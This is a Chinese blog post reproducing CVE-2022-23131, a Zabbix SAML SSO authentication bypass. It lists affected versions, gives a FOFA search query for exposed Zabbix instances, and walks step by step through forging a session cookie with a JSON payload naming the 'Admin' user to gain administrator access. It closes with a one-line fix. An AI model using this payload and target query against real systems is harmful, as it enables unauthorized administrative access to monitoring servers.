zabbix SAML SSO 登录绕过漏洞(CVE-2022-23131)

最新推荐文章于 2024-05-15 13:10:51 发布
最新推荐文章于 2024-05-15 13:10:51 发布
阅读量248 收藏
点赞数
文章标签: zabbix php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaobai_20190815/article/details/127535043
版权

一、漏洞详情


        在启用SAML SSO身份验证(非默认)的情况下,会话数据可能被恶意参与者修改,因为没有验证存储在会话中的用户登录。未经身份验证的恶意行为者可能利用此问题升级特权并获得对Zabbix Frontend的管理访问权。要执行攻击,需要启用SAML身份验证,参与者必须知道Zabbix用户的用户名(或使用guest帐户,默认情况下该帐户是禁用的)。


二、漏洞版本

4.0.36
5.4.0
5.4.8
6.0.0alpha1


三、环境搭建


fofa:app="ZABBIX-监控系统" && body="SAML"


四、漏洞复现


1、访问,获取cookie


2、base64解码


3、构造payload,需要已知Zabbix用户的用户名,这里我们默认用户名为Admin
 

{
"saml_data": {
"username_attribute": "Admin"
},
"sessionid": "c8ebc80cb2535327c66fd5f6021d0902",
"sign": "\/p+dShTP31SMr+Em5MIWEnp9iBDAxC3oT0Z5EvH76R2R5uBgzjyGBYAG4HmjB5fTcX8Kzjnh7CTe7panObWGVw=="
}


4、base64加密payload,然后构造cookie,访问/index_sso.php,返回值Location存在:action=dashboard.view


5、手动替换网页的cookie,刷新可按照Admin用户权限访问


五、修复建议

禁用 SAML 身份验证

whatever`
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
zabbix_agrent-5.0.28-linux-3.0
09-21
zabbix_agrent-5.0.28-linux-3.0
Zabbix登录绕过漏洞 [CVE-2022-23131].md
07-09
Zabbix登录绕过漏洞 [CVE-2022-23131]
phpsso.php 注入漏洞,PHPCMS V9 /phpsso_server/phpcms/modules/phpsso/index.php SQL注入漏洞
weixin_32286661的博客
03-13 686
/api/get_menu.phpfunction ajax_getlist() {$cachefile = $_GET['cachefile'];$cachefile = str_replace(array('/', '//'), '', $cachefile);//$cachefile = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S',...
Zabbix 攻击面挖掘与利用
st3pby的博客
12-23 611
Zabbix 攻击面挖掘与利用
赏金猎人系列-如何测试sso相关的漏洞
richard1230的博客
10-25 1124
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
赏金猎人系列-如何测试sso相关的漏洞(II)
richard1230的博客
10-31 53
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 本文选自本人公众号: growing0101 前言 本文承接前文,继续梳理sso漏洞相关的测试方法. 正文 第八种情况 如果发现有uuid的这种形式,可以尝试将其更改为攻击者的uuid,例如,你可以改为内部员工或者说是管理员的账户的电子邮...
Zabbix SAML SSO 登录绕过漏洞
Adminxe的博客
03-02 4903
一、简介 zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。 zabbix server可以通过SNMP,zabbix agent,ping,端口监视等方法提供对远程服务器/网络状态的监视,数据收集等功能,它可以运行在Linux,Solaris,HP-UX,AIX,Free BSD,Open BSD,OS X等平台上。 该漏洞源于在启用s.
Zabbix SAML SSO 登录绕过漏洞CVE-2022-23131
江左盟的博客
02-25 1万+
产品简介 Zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。zabbix server可以通过SNMP,zabbix agent,ping,端口监视等方法提供对远程服务器/网络状态的监视,数据收集等功能,它可以运行在Linux,Solaris,HP-UX,AI
zabbix 4 和5的区别
sky脾气的博客
12-01 3360
1界面区别 2在web页面中 4.0的图像监控和web检测 在5.0以上的版本都移到主机监测中 3 zabbix5.0的监控信息和菜单功能更加清晰 监测 主要就是监测信息 资产 负责统计公司具体数据 报表 待你去测试 配置 根据公司的需要建立监控机制 管理 对用户信息和报警进行维护 监测 配置 和管理 这三项是zabbix 我认为的核心使用功能 4 zabbix 5.0以上比4.0的性能更加稳定和安全 支持基于SAML身份验证的单点登录。 支持Webhook的HTTP代理,使从Z
Zabbix SAML SSO认证绕过漏洞CVE-2022-23131
Blue的博客
03-06 4829
漏洞描述 Zabbix对客户端提交的Cookie会话存在不安全的存储方式,导致在启动SAML SSO认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现RCE。 影响范围 5.4.0 - 5.4.8 6.0.0alpha1 漏洞复现 1.首先访问Zabbix首页,提取Cookie并进行base64解码: 2.构造poc我们加入username_attribute,将其赋值为Admin(Zabbix内置的管理员名称),并将其base64编码
zabbix-agent-4.0.30-1.el7.x86_64.zip
01-13
zabbix-agent-4.0.30-1.el7.x86_64.zip zabbix-agent-4.0.30-1.el7.x86_64.zip zabbix-agent-4.0.30-1.el7.x86_64.zip
linux安装zabbix4,添加监测客户机(centos7)(一)
renfeigui0的博客
02-11 1396
一、linux系统配置 二、yum安装zabbix-server 三、配置zabbinx-server 四、登陆zabbix-server,设置中文语言 五、被监控客户端部署zabbix-agent 六、添加被监测客户机
Zabbix4.0介绍
weixin_43707076的博客
10-24 195
概述 Zabbix 由 Alexei Vladishev 创建,目前由其成立的公司—— Zabbix SIA 积极的持续开发更新维护, 并为用户提供技术支持服务。 Zabbix 是一个企业级分布式开源监控解决方案。 Zabbix 软件能够监控众多网络参数和服务器的健康度、完整性。Zabbix 使用灵活的告警机制,允许用户为几乎任何事件配置基于邮件的告警。这样用户可以快速响应服务器问题。Zabbix 基于存储的数据提供出色的报表和数据可视化功能。这些功能使得 Zabbix 成为容量规划的理想选择。 Zabb
zabbix安装--centOS7.6系统安装zabbix4.0版本
weixin_41831919的博客
12-13 1094
linux系统版本 zabbix安装包含的软件 zabbix-server: 监控服务端 zabbix-agent: 监控客户端 zabbix-web: 监控网站服务 php: 处理动态请求 mysql: 数据库存储监控数据 zabbix: 负责收集agent信息汇总告知zabbix-server 关闭防火墙和selinux 添加zabbix源和epel源 [root@ecs-cb85 ~]# rpm -ivh https://mirrors.tuna.tsinghua.edu
Zabbix SAML SSO认证绕过漏洞(CVE-2022-23131)
m0_65150886的博客
01-02 345
Zabbix 是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的 CPU 负载和网络流量等指标。由于其受欢迎程度、功能和在大多数公司网络中的特权地位,Zabbix 是威胁参与者的高调目标。Zabbix对客户端提交的Cookie会话存在不安全的存储方式,导致在启动SAML SSO认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现RCE。2、升级安全版本(https://support.zabbix.com/browse/ZBX-20350)
CVE-2022-23131——绕过 SAML SSO 身份验证
热门推荐
LiBai'S BLOG
02-19 7万+
漏洞描述 安全断言标记语言 (SAML) 是最常见的单点登录 (SSO) 标准之一。围绕 XML 实现,它允许身份提供者(IdP,一个能够对用户进行身份验证的实体)告诉服务提供者(SP,这里是 Zabbix)你是谁。您可以将Zabbix Web 前端配置为允许通过 SAML 进行用户身份验证,但默认情况下不启用它,因为它需要了解身份提供者的详细信息。这是企业部署最常见的设置。 在启用 SAML SSO 身份验证的实例上,它允许绕过身份验证并获得管理员权限。攻击者可以使用此访问权限在链接的Zabbix Ser
如何同步管理1000个设备的VLAN数据?
最新发布
weixin_68261415的博客
05-15 735
为了方便VLAN的配置和维护,可在部门A和部门B内分别部署VCMP,管理域分别为VCMP1和VCMP2,并选择汇聚交换机AGG1作为VCMP1的Sever,接入交换机ACC1~ACC2作为VCMP1的Client,汇聚交换机AGG2作为VCMP2的Server,接入交换机ACC3~ACC4作为VCMP2的Client。这样,只需在汇聚或核心交换机上创建、删除VLAN或修改VLAN的名称、描述,同域内的接入交换机会同步修改,进而实现VLAN的集中管理,降低配置和维护的工作量。
CVE-2022-21371
07-29
CVE-2022-21371是一个漏洞编号,根据提供的引用内容,这个漏洞涉及到一个SAML单点登录SSO)功能的安全问题。通过利用一个POC(Proof of Concept)脚本,攻击者可以获取到一个session,并将其替换为cookie,从而实现未授权访问。\[3\]具体的攻击过程是,通过解码和解析一段JSON格式的数据,构造出一个payload,然后将其进行base64编码和URL编码,最后替换cookie中的session值。\[1\]\[2\]这个漏洞的具体细节和修复方法可以在提供的GitHub链接中找到。 #### 引用[.reference_title] - *1* *2* *3* [Zabbix-CVE-2022-23131复现](https://blog.csdn.net/weixin_45794666/article/details/123106641)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值